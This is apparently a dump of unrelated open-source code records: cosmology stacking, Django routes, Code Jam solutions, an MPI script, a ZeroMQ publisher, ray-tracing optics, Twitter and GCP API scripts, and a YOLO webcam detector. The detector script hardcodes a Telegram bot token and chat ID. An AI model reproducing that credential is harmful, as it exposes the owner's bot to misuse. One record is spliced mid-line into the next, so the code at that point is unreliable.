load_vrec_catalog_boss(pathOutCatalog):\n \"\"\"\n Code from Emmanuel Schaan to load in a BOSS v_rec catalog\n \"\"\"\n data = np.genfromtxt(pathOutCatalog)\n nObj = len(data[:,0])\n #\n # sky coordinates and redshift\n RA = data[:,0] # [deg]\n DEC = data[:,1] # [deg]\n Z = data[:,2]\n #\n # observed cartesian coordinates\n # coordX = data[:,3] # [Mpc/h]\n # coordY = data[:,4] # [Mpc/h]\n # coordZ = data[:,5] # [Mpc/h]\n # #\n # # displacement from difference,\n # # not including the Kaiser displacement,\n # # from differences of the observed and reconstructed fields\n # dX = data[:,6] # [Mpc/h]\n # dY = data[:,7] # [Mpc/h]\n # dZ = data[:,8] # [Mpc/h]\n # #\n # # Kaiser-only displacement\n # # originally from differences of the observed and reconstructed fields\n # dXKaiser = data[:,9] # [Mpc/h] from cartesian catalog difference\n # dYKaiser = data[:,10] # [Mpc/h]\n # dZKaiser = data[:,11] # [Mpc/h]\n # #\n # # velocity in cartesian coordinates\n # vX = data[:,12] #[km/s]\n # vY = data[:,13] #[km/s]\n # vZ = data[:,14] #[km/s]\n #\n # velocity in spherical coordinates,\n # from catalog of spherical displacements\n vR = data[:,15] # [km/s] from spherical catalog, >0 away from us\n # vTheta = data[:,16] # [km/s]\n # vPhi = data[:,17] # [km/s]\n # #\n # # Stellar masses\n # Mstellar = data[:,18] # [M_sun], from Maraston et al\n # #\n # # Halo mass\n # hasM = data[:,19]\n # Mvir = data[:,20] # [M_sun]\n # #\n # # Integrated optical depth [dimless]: int d^2theta n_e^2d sigma_T = (total nb of electrons) * sigma_T / (a chi)^2\n # integratedTau = data[:,21] # [dimless]\n # #\n # # Integrated kSZ signal [muK * sr]: int d^2theta n_e sigma_T (-v/c) Tcmb\n # integratedKSZ = data[:, 22] # [muK * sr]\n # #\n # # Integrated Y signal [sr]: int d^2theta n_e sigma_T (kB Te / me c^2)\n # # needs to be multiplied by Tcmb * f(nu) to get muK\n # integratedY = data[:, 23] # [sr]\n return RA,DEC,Z,vR\n\n\ndef postprocess(stack_path,mf_path,save_name=None,ignore_param=False,args=None,ignore_last=None):\n\n if mf_path is not \"\":\n smf_path = mf_path if (ignore_last is None) else mf_path[:-ignore_last]\n mf_paramstr = re.search(rf'plmin_(.*?)_meanfield', smf_path).group(1)\n sstack_path = stack_path if (ignore_last is None) else stack_path[:-ignore_last]\n st_paramstr = re.search(rf'plmin_(.*)', sstack_path).group(1)\n\n if not(ignore_param):\n if mf_path is not \"\":\n try:\n assert mf_paramstr==st_paramstr\n except:\n print(mf_paramstr)\n print(st_paramstr)\n print(\"ERROR: The parameters for the stack and mean-field do not match.\")\n raise\n\n tap_per = float(re.search(rf'tapper_(.*?)_padper', stack_path).group(1))\n pad_per = float(re.search(rf'padper_(.*?)_', stack_path).group(1))\n stamp_width_arcmin = float(re.search(rf'swidth_(.*?)_tapper', stack_path).group(1))\n klmin = int(re.search(rf'klmin_(.*?)_klmax', stack_path).group(1))\n klmax = int(re.search(rf'klmax_(.*?)_lxcut', stack_path).group(1))\n\n\n s_stack, shape_stack, wcs_stack, kmask, modrmap, bin_edges,data,profs = load_dumped_stats(stack_path,get_extra=True)\n if not(save_name is None):\n save_dir = f'{paths.postprocess_path}/{save_name}'\n io.mkdir(f'{save_dir}')\n if data is not None: \n io.save_cols(f'{save_dir}/{save_name}_catalog_data.txt',[data[key] for key in sorted(data.keys())],header=' '.join([key for key in sorted(data.keys())]))\n\n if mf_path is not \"\":\n s_mf, shape_mf, wcs_mf = load_dumped_stats(mf_path)\n\n if mf_path is not \"\":\n assert np.all(shape_stack==shape_mf)\n assert wcsutils.equal(wcs_stack,wcs_mf)\n assert np.all(shape_stack==kmask.shape)\n\n shape = shape_stack\n wcs = wcs_stack\n cents = (bin_edges[:-1]+bin_edges[1:])/2.\n if not(save_name is None):\n crop = int(args.cwidth / defaults.pix_width_arcmin)\n\n unweighted_stack,nmean_weighted_kappa_stack,opt_weighted_kappa_stack,opt_binned,opt_covm,opt_corr,opt_errs,binned,covm,corr,errs = analyze(s_stack,wcs)\n if mf_path is not \"\":\n mf_unweighted_stack,mf_nmean_weighted_kappa_stack,mf_opt_weighted_kappa_stack,mf_opt_binned,mf_opt_covm,mf_opt_corr,mf_opt_errs,mf_binned,mf_covm,mf_corr,mf_errs = analyze(s_mf,wcs)\n\n # if profs is not None:\n # profs = profs - mf_binned\n # arcmax = 8.\n # profs = profs[:,cents0]\n arcmax = args.arcmax\n nbins = bin_edges[bin_edges\\d+)$', login_required(editar), name=\"editar\"),\n url(r'^borrar/(?P\\d+)$', login_required(borrar), name=\"borrar\"),\n url(r'^charts$', login_required(charts), name=\"charts\"),\n #url(r'^nuevo_usuario$', nuevo_usuario, name=\"nuevo_usuario\"),\n #url(r'^cerrar_sesion$', login_required(logout_view), name=\"cerrar_sesion\"),\n #url(r'^ingresar_usuario/$', ingresar, name=\"ingresar_usuario\"),\n #url(r'^accounts/login/', ingresar)\n #url(r'^borrar/(?P\\d+)$', BancoDelete.as_view() , name=\"borrar\"),\n]","repo_name":"diegoquirozramirez/DjangoWeb","sub_path":"Apps/Banco/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23455852081","text":"import os\n\n# Determine the number of test cases\nwith open(os.path.expanduser('~/Downloads/A-small-attempt1.in'), 'r') as f:\n n_cases = int(f.readline())\n\ndef test_ovation(d, shyness, t):\n needed = [0]\n for k in range(0, len(shyness)):\n if d[k] < k+1:\n needed.append(k+1 - d[k])\n with open('output.txt', 'a') as f:\n f.write(\"Case #%s: %s\" % (t, max(needed)))\n\nfor t in xrange(1, (n_cases + 1)):\n f = open(os.path.expanduser('~/Downloads/A-small-attempt1.in'))\n for i, l in enumerate(f):\n if i == t:\n shyness = list(l[2:-1])\n d = {k: 0 for k in range(0, len(shyness))}\n for k in range(0, len(shyness)):\n # Initialize a dictionary with the number of people that would be standing\n # if everyone at each level stood up.\n if k == 0:\n d[k] += int(shyness[k])\n else:\n d[k] += (d[k-1] + int(shyness[k]))\n test_ovation(d, shyness, t)\n if t < n_cases + 1:\n with open('output.txt', 'a') as f:\n f.write('\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/3710.py","file_name":"3710.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2514487093","text":"import numpy as np\r\nimport time\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\n# initialization of MPI communication\r\nfrom mpi4py import MPI\r\n\r\ncomm = MPI.COMM_WORLD\r\nprocess = MPI.COMM_WORLD.Get_rank()\r\nnumProcess = MPI.COMM_WORLD.Get_size()\r\n# command to run on terminal\r\n# mpirun -n 8 /bin/python3 /home/tr0fin0/Downloads/tmp_OS202/setup.py\r\n\r\nnombre_cas: int = 256\r\nnb_cellules: int = 360 # Cellules fantomes\r\nnb_iterations: int = 360\r\n\r\ncompute_time = 0.\r\ndisplay_time = 0.\r\n\r\n\r\n# add \"./images/\" to saving path to store all images separately from the main code.\r\ndef save_as_md(cells, symbols='⬜⬛'):\r\n res = np.empty(shape=cells.shape, dtype=' 0:\n x = n % 10\n if x > last:\n return False\n last = x\n n /= 10\n return True\n\ndef make_tidy(n):\n digits = []\n while n > 0:\n digits.append(n % 10)\n n /= 10\n digits = list(reversed(digits))\n last_num = 0\n for pos in xrange(len(digits)):\n if digits[pos] < last_num:\n num_to_care = digits[pos - 1]\n i = pos - 1\n while digits[i] == num_to_care:\n i -= 1\n if i == -1:\n break\n digits[i + 1] = num_to_care - 1\n '''for i in xrange(0, pos-1):\n if digits[i] > digits[pos-1]:\n digits[i] = digits[pos-1]'''\n for i in xrange(i + 2, len(digits)):\n digits[i] = 9\n break\n else:\n last_num = digits[pos]\n #print digits\n return reduce(lambda a, b: a*10 + b, digits)\n\ndef make_tidy_naive(n):\n while n > 0:\n if check_tidy(n):\n return n\n n -= 1\n\ninp = map(int, open(\"B-large.in\").read().split(\"\\n\"))\no = open(\"output.txt\", \"w\")\nfor x in xrange(1, len(inp)):\n #if make_tidy(inp[x]) != make_tidy_naive(inp[x]):\n # print inp[x], make_tidy(inp[x]), make_tidy_naive(inp[x])\n # break\n o.write(\"Case #\" + str(x) + \": \" + str(make_tidy(inp[x])) + \"\\n\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3527.py","file_name":"3527.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37027370145","text":"import zmq\nimport random\nimport sys\nimport time\nport = \"500901\"\ncontext = zmq.Context()\nsocket = context.socket(zmq.PUB)\nsocket.bind(\"tcp://*:%s\" % port)\ntime.sleep(1)\n#\npath = \"/home/rl/countersLHCo/\"\n#\nrun = \"527345\"\nfilename = path + \"20221014.cc\"\n#\n#run = \"528543\"\n#run = \"528537\"\n#filename = path + \"20221102.cc\"\n#\n#run = \"527963\"\n#filename = path + \"20221024.cc\"\n#\n#run = \"527349\"\n#filename = path + \"20221015.cc\"\n#\nfilecfg = path + run + \".rcfg\"\n#\nif len(sys.argv) == 2:\n run = sys.argv[1]\n int(run)\nelif len(sys.argv) == 3:\n port = sys.argv[1]\n int(port)\n print(\"port:\", port)\nprint(\"run:\", run)\n#\n\n# CTP Config\ndef sendctpconfig(starttime):\n print(\"starttime:\",starttime)\n fcfg = open(filecfg,\"r\")\n lines = fcfg.readlines()\n ctpcfg = starttime+\" \"\n for line in lines:\n ctpcfg += line\n fcfg.close()\n print(ctpcfg)\n senddata(\"ctpconfig\",ctpcfg)\ndef senddata(header, messagedata):\n global socket\n data = messagedata\n if len(data) > 20:\n data = data[0:20]\n print(\"Sending:\",header, data)\n data = str(messagedata).encode('UTF-8')\n header = str(header).encode('UTF-8')\n test = str(\"test\").encode('UTF-8')\n msg = [header, data,test]\n socket.send_multipart(msg)\n time.sleep(1)\n##########################\n#\nf = open(filename,\"r\")\n#\nn = 0\nstart = time.time()\nruncnts = []\nrunactive = 0\nwhile True:\n line = f.readline()\n if not line:\n break\n items = line.split(\" \")\n runfound = 0\n for i in range(1,17):\n if items[i] == run:\n runcnts.append(line)\n runfound = 1\n print(\"1:\",line[0:20])\n break;\n if (runfound == 1) and (runactive == 0):\n runactive = 1\n if (runfound == 0) and (runactive==1):\n runcnts.append(line)\n runactive = 0\n print(\"0:\",line[0:20])\n\nprint(\"runcnts size:\", len(runcnts))\nstarttime = runcnts[0].split(\" \",1)[0]\n#\nsendctpconfig(starttime)\ntime.sleep(5)\nsenddata(\"sox\",runcnts[0])\nfor line in runcnts[1:-1]:\n senddata(\"ctpd\",line)\nsenddata(\"eox\",runcnts[-1])\n\n\n\n","repo_name":"AliceO2Group/AliceO2","sub_path":"Detectors/CTP/workflowScalers/py/createCnts.py","file_name":"createCnts.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"61"} +{"seq_id":"44405147001","text":"import numpy as np\n\ndef R(angle):\n C, S = np.cos(angle), np.sin(angle)\n return np.array([[C,-S],[S,C]])\n\nclass Field:\n\n def __init__(self, h, dim, n=1):\n self.dim = dim\n self.h = h\n self.F = np.full(dim, n, dtype=float)\n\n def add_material(self, geometry, n):\n\n h = self.h\n Ny, Nx = self.dim\n \n \n for j in range(Nx):\n for i in range(Ny):\n x, y = h*j, h*(Ny-i)\n if geometry(x,y):\n self.F[i,j] = n\n\n def get(self):\n return self.F\n\n\nclass Lightbeam:\n\n def __init__(self, v, y0, tau):\n self.v = v/(v@v)**(0.5) # normalization\n self.y0 = y0\n self.tau = tau\n\n def propagate(self, F, T):\n v, y0, tau = self.v, self.y0, self.tau\n N, h = F.get(), F.h\n Ny, Nx = F.dim\n\n L = np.zeros((T+1, 2))\n L[0] = [0, y0]\n\n for t in range(T):\n L[t+1] = v*tau + L[t]\n j1, i1 = int(L[t,0]/h), int(L[t,1]/h)\n j2, i2 = int(L[t+1,0]/h), int(L[t+1,1]/h )\n if (j1 >= Nx) | (j2 >= Nx) | (i1 >= Ny) | (i2 >= Ny):\n L = L[:t+1]\n break\n if N[i1,j1] != N[i2,j2]:\n ni, nr = N[i1,j1], N[i2,j2]\n D = 20*int(Nx/Ny)\n for k in range(1,100):\n Un = N[i2+D, j2-k:j2+1+k] # upper row\n #print('U', Un)\n if (Un[0] == ni) & (nr in Un):\n Uj = k-np.min(np.where(Un == nr))\n break\n for k in range(1,100):\n Ln = N[i2-D, j2-k:j2+1+k] # lower row\n #print('L', Ln)\n if (Ln[0] == ni) & (nr in Ln):\n Lj = k-np.min(np.where(Ln == nr))\n break\n n = np.array([1, -(Uj-Lj)/(2*D)])\n #print(n)\n n = n/(n@n)**(0.5) # normalization\n c = n@v\n nr = ni/nr\n if c < 0:\n n = -n\n c = -c\n sinr = (nr**2)*(1-(c**2))\n if sinr > 1:\n v = 0\n else:\n v = nr*v + (nr*c-(1-sinr)**0.5)*n\n v = v/(v@v)**(0.5)\n return L\n\n\nimport matplotlib.pyplot as plt\n\na, b = 0.5, 2\nH, B = 1440, 3440\nh = 10**(-2)\nx0, y0 = B/4*h, H/2*h\n#geometry = lambda x, y: (abs(((x-x0)/a)**2-((y-y0)/b)**2) <= 1) & (abs(y-y0) <= 0.35*H*h)\n#geometry = lambda x, y: abs((y-y0)-2*(x-x0)) <= 2\n#geometry = lambda x, y: abs(((x-x0)/a)**2+((y-y0)/b)**2) < 0.35*H*h\n\ndef ellips(a,b,x0,y0):\n return lambda x,y: abs(((x-x0)/a)**2+((y-y0)/b)**2) < 0.35*H*h\n\ndef hyperbole(a,b,x0,y0):\n return lambda x,y: (abs(((x-x0)/a)**2-((y-y0)/b)**2) <= 1) & (abs(y-y0) <= 0.5*H*h)\n\nN = Field(h, (H,B))\nn = 1.7\n#N.add_material(hyperbole(a,b,x0,y0), n)\nN.add_material(ellips(a,b,x0,y0), n)\n\nfor i in range(0, 2):\n light = Lightbeam(np.array([np.cos(-np.pi*i/9),np.sin(-np.pi*i/9)]), H/2*h+200*h, h)\n L = light.propagate(N, B)\n x, y = L[:, 0]/h, L[:, 1]/h\n plt.plot(x,y, color=\"white\", lw=2)\nN = N.get()\nN[np.where(N==n)] = 2\n\nplt.plot(np.arange(0,B,1), np.full(B,H/2), ls='--')\nplt.imshow(N, cmap='RdBu', origin='lower')\nplt.savefig(\"N.png\")","repo_name":"vbelpair/Ugent","sub_path":"optics.py","file_name":"optics.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23548519891","text":"fread = open('A-large.in')\nlines = fread.readlines()\nfw = open('output', 'w')\n\nT = int(lines[0][0:-1])\n\nfor t in range(T):\n line = lines[t+1].split(\" \")\n S = list(line[0])\n K = int(line[1])\n\n flips = 0\n for i in range(len(S)-K+1):\n if S[i]=='-':\n flips += 1\n for j in range(i, i+K):\n if S[j]=='+':\n S[j] = '-'\n else:\n S[j] = '+'\n\n allflipped = True\n for i in range(len(S)-K+1, len(S)):\n if S[i]=='-':\n allflipped = False\n\n result = ''\n if not allflipped:\n result = 'IMPOSSIBLE'\n else:\n result = str(flips)\n\n fw.write('Case #{}: {}\\n'.format(t+1, result))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/539.py","file_name":"539.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3481079484","text":"import tweepy,os,sys,json\nfrom functions import fun1\n\nwith open(os.path.join(os.getcwd(),\"tokens.json\")) as f:\n tokenData = json.load(f)\n\napi = fun1.initialiseAPIconnection(tokenData[\"consumerKey\"],tokenData[\"consumerSecretKey\"], tokenData[\"accessToken\"], tokenData[\"accessTokenSecret\"])\nusers = input(\"Please enter a user Id's with space seperation\\n\")\nlistOfUserIDs = users.split(\" \")\nfollowersList = []\nfriendsList = []\nfor userId in listOfUserIDs:\n if(not userId.isnumeric() or \".\" in userId):\n print(\"entered invalid user id:\"+ userId+\".....continuing with other user\")\n continue\n userId = int(userId)\n try:\n userInfo = api.get_user(user_id = userId)\n except tweepy.TweepError as e:\n print(\"exception thrown by tweepy\",e)\n continue\n for page in tweepy.Cursor(api.followers, user_id = userId,wait_on_rate_limit=True).pages():\n try:\n followersList.extend(page)\n except tweepy.TweepError as e:\n print(e)\n print(\"The followers list:\")\n for followerInfo in followersList:\n try:\n print(\" ->\"+followerInfo.screen_name)\n except tweepy.TweepError as e:\n print(e)\n\n # friends list\n for page in tweepy.Cursor(api.friends_ids, user_id = int(userId),wait_on_rate_limit=True,count=1000).pages():\n try:\n friendsList.extend(page)\n except tweepy.TweepError as e:\n print(e)\n userScreenName = userInfo.screen_name\n frieList = []\n print(\"The friends list:\")\n for friendId in friendsList:\n frieList = []\n friendScreenName = api.get_user(friendId).screen_name\n for page1 in tweepy.Cursor(api.friends, user_id = int(friendId),wait_on_rate_limit=True,count=1000).pages():\n try:\n frieList.extend(page1)\n except tweepy.TweepError as e:\n print(e)\n listOfFriendScreenNames = [f1.screen_name for f1 in frieList]\n if(userScreenName in listOfFriendScreenNames):\n print(\" ->\"+friendScreenName)\n","repo_name":"vajjasaikiran/projects","sub_path":"python/194161016-4/194161016_q1b.py","file_name":"194161016_q1b.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22648340854","text":"import cv2\r\nimport numpy as np\r\nimport telepot\r\nimport os\r\n\r\n\r\n\r\ntoken = '5751445359:AAFzaIht-oboCxA8RAuJPct4kBtDqR7a9vM'\r\n#id_penerima = 1441844129\r\nid_penerima = 1441844129\r\n\r\nlokasi = 'History'\r\nif not os.path.exists(lokasi):\r\n\tprint('Lokasi Cache: ', lokasi)\r\n\tos.makedirs(lokasi)\r\n\r\n\r\nbot = telepot.Bot(token)\r\nnet = cv2.dnn.readNet(\"training_data.weights\", \"training_data.cfg\")\r\nclasses = []\r\nwith open(\"object.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\r\n\r\n# Loading web cam\r\ncamera = cv2.VideoCapture(1)\r\n\r\nwhile True:\r\n _,img = camera.read()\r\n height, width, channels = img.shape\r\n\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (320, 320), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n # Showing informations on the screen\r\n class_ids = []\r\n confidences = []\r\n boxes = []\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5:\r\n # Object detected\r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width)\r\n h = int(detection[3] * height)\r\n # Rectangle coordinates\r\n x = int(center_x - w / 2)\r\n y = int(center_y - h / 2)\r\n boxes.append([x, y, w, h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\r\n\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x, y, w, h = boxes[i]\r\n label = str(classes[class_ids[i]])\r\n print(label)\r\n color = colors[i]\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\r\n cv2.putText(img, label, (x, y + 30), font, 3, color, 3)\r\n cv2.imwrite(lokasi+'/{}.jpg'.format(label),img)\r\n #bot.sendMessage(id_penerima,label)\r\n #bot.sendPhoto(id_penerima, photo=open('History/'+label+'.jpg','rb') )\r\n\r\n cv2.imshow(\"Image\", img)\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncamera.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"Dzikrul-Hamdi-Nasution/Deteksi-Pencurian-dalm-Ruangan-","sub_path":"V2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4111846762","text":"import json\nfrom typing import Any, List\nfrom uuid import uuid4\n\nimport arbiter\nfrom google.api_core.extended_operation import ExtendedOperation\nfrom google.cloud import compute_v1\nfrom google.cloud.compute_v1.types import Image\nfrom google.oauth2.service_account import Credentials\n\nfrom control_tower.cloud.common import get_instances_requirements, get_instance_init_script, \\\n wait_for_instances_start\nfrom control_tower.run import logger\n\n\ndef wait_for_extended_operation(\n operation: ExtendedOperation, verbose_name: str = \"operation\", timeout: int = 300\n) -> Any:\n \"\"\"\n This method will wait for the extended (long-running) operation to\n complete. If the operation is successful, it will return its result.\n If the operation ends with an error, an exception will be raised.\n If there were any warnings during the execution of the operation\n they will be printed to sys.stderr.\n\n Args:\n operation: a long-running operation you want to wait on.\n verbose_name: (optional) a more verbose name of the operation,\n used only during error and warning reporting.\n timeout: how long (in seconds) to wait for operation to finish.\n If None, wait indefinitely.\n\n Returns:\n Whatever the operation.result() returns.\n\n Raises:\n This method will raise the exception received from `operation.exception()`\n or RuntimeError if there is no exception set, but there is an `error_code`\n set for the `operation`.\n\n In case of an operation taking longer than `timeout` seconds to complete,\n a `concurrent.futures.TimeoutError` will be raised.\n \"\"\"\n result = operation.result(timeout=timeout)\n\n if operation.error_code:\n logger.error(\n f\"Error during {verbose_name}: \"\n f\"[Code: {operation.error_code}]: {operation.error_message}\")\n logger.error(f\"Operation ID: {operation.name}\")\n raise operation.exception() or RuntimeError(operation.error_message)\n\n if operation.warnings:\n logger.warning(f\"Warnings during {verbose_name}:\\n\")\n for warning in operation.warnings:\n logger.warning(f\" - {warning.code}: {warning.message}\")\n\n return result\n\n\ndef get_ubuntu_image(credentials: Credentials) -> Image:\n image_client = compute_v1.ImagesClient(credentials=credentials)\n newest_image = image_client.get_from_family(project=\"ubuntu-os-cloud\",\n family=\"ubuntu-2204-lts\")\n return newest_image\n\n\ndef get_machine_type(cpu, memory):\n memory_in_mb = memory << 10\n cpu = cpu if cpu % 2 == 0 else cpu + 1\n return f\"custom-{cpu}-{memory_in_mb}\"\n\n\ndef create_instance(\n credentials: Credentials, name: str, spot: bool, user_data: str, project: str,\n zone: str, machine_type: str\n) -> ExtendedOperation:\n instance_client = compute_v1.InstancesClient(credentials=credentials)\n instance = compute_v1.Instance(\n name=name,\n machine_type=f'zones/{zone}/machineTypes/{machine_type}',\n disks=[compute_v1.AttachedDisk(\n architecture=\"X86_64\",\n auto_delete=True,\n boot=True,\n disk_size_gb=10,\n initialize_params={\n \"source_image\": get_ubuntu_image(credentials).self_link\n }\n )],\n metadata={\n \"items\": [\n {'key': 'startup-script', 'value': user_data}]\n }\n )\n network_interface = compute_v1.NetworkInterface()\n access = compute_v1.AccessConfig()\n access.type_ = compute_v1.AccessConfig.Type.ONE_TO_ONE_NAT.name\n access.name = \"External NAT\"\n network_interface.access_configs = [access]\n instance.network_interfaces = [network_interface]\n if spot:\n instance.scheduling = compute_v1.Scheduling()\n instance.scheduling.provisioning_model = (\n compute_v1.Scheduling.ProvisioningModel.SPOT.name\n )\n instance.scheduling.instance_termination_action = \"DELETE\"\n\n return instance_client.insert(project=project,\n zone=zone,\n instance_resource=instance)\n\n\ndef create_gcp_instances(args, gcp_settings):\n logger.info(\"Requesting GCP Instances...\")\n queue_name = str(uuid4())\n finalizer_queue_name = str(uuid4())\n\n cpu, instance_count, memory = get_instances_requirements(args, gcp_settings, queue_name)\n machine_type = get_machine_type(cpu, memory)\n user_data = get_instance_init_script(args, cpu, finalizer_queue_name, memory, queue_name, instance_count)\n service_account_info = json.loads(gcp_settings[\"service_account_info\"])\n credentials = Credentials.from_service_account_info(service_account_info)\n\n instance_names = [f\"test-{i + 1}-{queue_name[:8]}\" for i in range(instance_count)]\n operations = [\n create_instance(\n credentials=credentials,\n name=instance_name,\n spot=gcp_settings[\"instance_type\"] == \"spot\",\n user_data=user_data,\n project=gcp_settings[\"project\"],\n zone=gcp_settings[\"zone\"],\n machine_type=machine_type\n )\n for instance_name in instance_names\n ]\n for instance, operation in zip(instance_names, operations):\n wait_for_extended_operation(operation, f\"instance {instance} creation\")\n logger.info(f\"Instance {instance} created.\")\n\n wait_for_instances_start(\n args, instance_count,\n lambda: terminate_instances(credentials, gcp_settings[\"project\"],\n gcp_settings[\"zone\"], instance_names)\n )\n terminate_task_kwargs = {\n \"service_account_info\": service_account_info,\n \"project\": gcp_settings[\"project\"],\n \"zone\": gcp_settings[\"zone\"],\n \"instances\": instance_names\n }\n\n finalizer_task = arbiter.Task(\"terminate_gcp_instances\", queue=finalizer_queue_name,\n task_type=\"finalize\", task_kwargs=terminate_task_kwargs)\n return finalizer_task\n\n\ndef terminate_instances(\n credentials: Credentials, project: str, zone: str, instances: List[str]\n):\n instance_client = compute_v1.InstancesClient(credentials=credentials)\n operations = [\n instance_client.delete(\n project=project,\n zone=zone,\n instance=instance_name\n ) for instance_name in instances\n ]\n for instance, operation in zip(instances, operations):\n wait_for_extended_operation(operation, f\"instance {instance} termination\")\n logger.info(f\"Instance {instance} terminated.\")\n","repo_name":"carrier-io/control_tower","sub_path":"control_tower/cloud/gcp.py","file_name":"gcp.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14952915412","text":"''' 1) Write a Python function that takes two strings as input and find the longest substring that is \r\ncommon to both strings.'''\r\n\r\ndef lcs(string1, string2):\r\n longest_length = 0\r\n ending_index = 0\r\n table = [[0] * (len(string2) + 1) for _ in range(len(string1) + 1)]\r\n\r\n for i in range(1, len(string1) + 1):\r\n for j in range(1, len(string2) + 1):\r\n if string1[i - 1] == string2[j - 1]:\r\n table[i][j] = table[i - 1][j - 1] + 1\r\n if table[i][j] > longest_length:\r\n longest_length = table[i][j]\r\n ending_index = i\r\n longest_substring = string1[ending_index - longest_length:ending_index]\r\n\r\n return longest_substring\r\n\r\nstr1 = \"foobarbaz\"\r\nstr2 = \"barfoobaz\"\r\nresult = lcs(str1, str2)\r\nprint(result)\r\n\r\nstr3 = 'abcdefg'\r\nstr4 = 'xyabcz'\r\nresult = lcs(str3, str4)\r\nprint(result)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"VDB11/Coding-Challenge","sub_path":"Challenge_1.py","file_name":"Challenge_1.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33916500691","text":"\"\"\"Run tkinter aligner UI part, based on aligner_ui.py\"\"\"\n\nimport os\nimport tkinter as tk\nfrom tkinter import messagebox\n# import atexit\n\nimport logzero\nfrom logzero import logger\n\nfrom tkaligner.aligner_ui import Aligner\n\n\ndef tkaligner() -> None:\n \"\"\" tkinter aligner UI part\n \"\"\"\n\n root = tk.Tk()\n\n # top = tk.Toplevel(root)\n # Aligner(top)\n\n Aligner(root)\n\n logger.debug(\"tkaligner debug \")\n\n def on_closing():\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n root.destroy()\n\n root.protocol(\"WM_DELETE_WINDOW\", on_closing)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n\n _ = os.environ.get(\"ALIGNER_DEBUG\")\n if _ is not None and _.lower() in [\"1\", \"true\"]:\n logzero.loglevel(10) # 10: DEBUG, default 20: INFO:\n else:\n logzero.loglevel(20)\n logger.info('os.environ.get(\"ALIGNER_DEBUG\"): %s', _)\n\n tkaligner()\n","repo_name":"ffreemt/tkaligner-bumblebee","sub_path":"tkaligner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37199508563","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BookSpider(scrapy.Spider):\n name = 'book'\n allowed_domains = ['jinyongwang.com']\n start_urls = ['http://www.jinyongwang.com/book/']\n\n def parse(self, response):\n # //p[@class='title']/a[starts-with(@href, '/n')] 新修版\n for link in response.xpath(\"//p[@class='title']/a[starts-with(@href, '/n')]/@href\").extract():\n yield scrapy.Request(response.urljoin(link), callback=self.book_parse)\n\n def book_parse(self, response):\n # //h1[@class='title']/span/text() Book name\n # //ul[@class='mlist']/li/a Chapter link\n for link in response.xpath(\"//ul[@class='mlist']/li/a/@href\").extract():\n yield scrapy.Request(response.urljoin(link), callback=self.chap_parse)\n\n def chap_parse(self, response):\n # //div[@class='topleft']/span/a/text() Book name\n # //h1[@id='title']/text() Chapter name\n # //div[@id='vcon']/p/text() Content\n yield {\n 'sn': response.url.split('/')[-1].split('.')[0],\n 'book': response.xpath(\"//div[@class='topleft']/span/a/text()\").extract()[1],\n 'chap': response.xpath(\"//h1[@id='title']/text()\").extract_first(),\n 'lines': response.xpath(\"//div[@id='vcon']/p/text()\").extract(),\n }\n","repo_name":"alai04/scrapy-study","sub_path":"jinyong/jinyong/spiders/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71510421634","text":"from typing import 